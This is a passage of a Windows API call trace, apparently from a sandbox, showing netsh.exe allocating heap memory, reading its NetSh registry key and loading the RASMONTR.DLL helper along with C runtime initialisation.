(HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3060 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3080 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f30a0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f30c0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f30e0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3100 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3120 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3140 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3160 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3180 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f31a0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f31c0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f31e0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3200 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3220 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3240 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3260 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3280 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f32a0 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f32c0 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f32e0 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3300 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3320 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3340 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3360 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3380 [0173.932] GetProcessHeap () returned 0x2d0000 [0173.932] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f33a0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f33c0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f33e0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3400 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3420 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3440 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3460 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3480 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f34a0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f34c0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f34e0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3500 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3520 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3540 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3560 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3580 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f35a0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f35c0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f35e0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3600 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3620 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3640 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3660 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3680 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f36a0 [0173.933] GetProcessHeap () returned 0x2d0000 [0173.933] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f36c0 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f36e0 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3700 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3720 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3740 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3760 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3780 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f37e0 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3800 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3820 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3840 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3860 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3880 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f38a0 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f38c0 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f38e0 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3900 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3920 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3940 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3960 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3980 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f39a0 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f39c0 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f39e0 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3a00 [0173.934] GetProcessHeap () returned 0x2d0000 [0173.934] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3a20 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3a40 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3a60 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3a80 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3aa0 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3ac0 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3ae0 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3b00 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3b20 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3b40 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3b60 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3b80 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3ba0 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3bc0 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3be0 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3c00 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3c20 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3c40 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3c60 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3c80 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3ca0 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3cc0 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3ce0 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3d00 [0173.935] GetProcessHeap () returned 0x2d0000 [0173.935] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3d20 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3d40 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3d60 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3d80 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3da0 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3dc0 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3de0 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3e00 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3e20 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3e40 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3e60 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3e80 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3ea0 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3ec0 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3ee0 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3f00 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3f20 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3f40 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3f60 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3f80 [0173.936] GetProcessHeap () returned 0x2d0000 [0173.936] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3fe0 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4000 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4020 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4040 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4060 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4080 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f40a0 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f40c0 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f40e0 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4100 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4120 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4140 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4160 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4180 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f41a0 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f41c0 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f41e0 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4200 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f4220 [0173.937] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0173.937] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0173.937] GetProcessHeap () returned 0x2d0000 [0173.937] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2ee070 [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2) returned 0x2f47b0 [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x2f4240 [0173.938] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x58) returned 0x2f47d0 [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb0) returned 0x2eeb10 [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f47d0 | out: hHeap=0x2d0000) returned 1 [0173.938] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x1e7a08 | out: phkResult=0x1e7a08*=0x90) returned 0x0 [0173.938] RegQueryInfoKeyW (in: hKey=0x90, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1e7a30, lpcbMaxValueNameLen=0x1e7a40, lpcbMaxValueLen=0x1e7a38, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1e7a30*=0x15, lpcbMaxValueNameLen=0x1e7a40, lpcbMaxValueLen=0x1e7a38, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x16) returned 0x2f4260 [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x23) returned 0x2ee0a0 [0173.938] RegEnumValueW (in: hKey=0x90, dwIndex=0x0, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="4", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0173.938] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0173.938] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0173.938] GetProcessHeap () returned 0x2d0000 [0173.938] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x50) returned 0x2f47d0 [0173.939] GetProcessHeap () returned 0x2d0000 [0173.939] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4) returned 0x2f4830 [0173.939] GetProcessHeap () returned 0x2d0000 [0173.939] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x2ee0d0 [0173.939] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0173.939] GetProcessHeap () returned 0x2d0000 [0173.939] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ee070 | out: hHeap=0x2d0000) returned 1 [0173.939] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x7fef83a0000 [0173.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1e7400 | out: lpSystemTimeAsFileTime=0x1e7400*(dwLowDateTime=0x6a6c5f90, dwHighDateTime=0x1d4f12b)) [0173.955] GetCurrentProcessId () returned 0x4fc [0173.955] GetCurrentThreadId () returned 0x560 [0173.955] GetTickCount () returned 0x151e6 [0173.955] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x1e7408 | out: lpPerformanceCount=0x1e7408*=13828137919) returned 1 [0173.956] LoadLibraryA (lpLibFileName="MSVCRT.DLL") returned 0x7fefee20000 [0173.956] GetVersion () returned 0x1db10106 [0173.956] SetErrorMode (uMode=0x0) returned 0x0 [0173.956] SetErrorMode (uMode=0x8001) returned 0x0 [0173.956] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x2f61c0 [0173.956] LocalFree (hMem=0x2f61c0) returned 0x0 [0173.956] GetVersion () returned 0x1db10106 [0173.957] GlobalLock (hMem=0xa60008) returned 0x2f61c0 [0173.958] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x2f63e0 [0173.958] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2f4f10 [0173.958] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2f4280 [0173.958] malloc (_Size=0x100) returned 0x257c90 [0173.958] __dllonexit () returned 0x7fef413621c [0173.958] __dllonexit () returned 0x7fef41366e0 [0173.958] __dllonexit () returned 0x7fef41372b8 [0173.958] __dllonexit () returned 0x7fef41387cc [0173.958] __dllonexit () returned 0x7fef4138d64 [0173.958] __dllonexit () returned 0x7fef4138db4 [0173.958] __dllonexit () returned 0x7fef4138e70 [0173.959] __dllonexit () returned 0x7fef413a308 [0173.959] __dllonexit () returned 0x7fef4138810 [0173.959] __dllonexit () returned 0x7fef4147598 [0173.959] __dllonexit () returned 0x7fef4138880 [0173.959] __dllonexit () returned 0x7fef413a170 [0173.959] __dllonexit () returned 0x7fef413a280 [0173.959] __dllonexit () returned 0x7fef413ad44 [0173.959] __dllonexit () returned 0x7fef413bc30 [0173.959] __dllonexit () returned 0x7fef413bc80 [0173.959] __dllonexit () returned 0x7fef413c338 [0173.959] __dllonexit () returned 0x7fef413d030 [0173.959] __dllonexit () returned 0x7fef41359cc [0173.960] __dllonexit () returned 0x7fef41359f0 [0173.960] __dllonexit () returned 0x7fef4135a1c [0173.961] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fd [0173.961] __dllonexit () returned 0x7fef4147568 [0173.961] __dllonexit () returned 0x7fef4147574 [0173.961] __dllonexit () returned 0x7fef4147580 [0173.961] __dllonexit () returned 0x7fef414758c [0173.961] GetVersion () returned 0x1db10106 [0173.961] GetVersion () returned 0x1db10106 [0173.962] GetVersion () returned 0x1db10106 [0173.962] __dllonexit () returned 0x7fef409a15c [0173.962] __dllonexit () returned 0x7fef40a6610 [0173.962] __dllonexit () returned 0x7fef4138910 [0173.962] 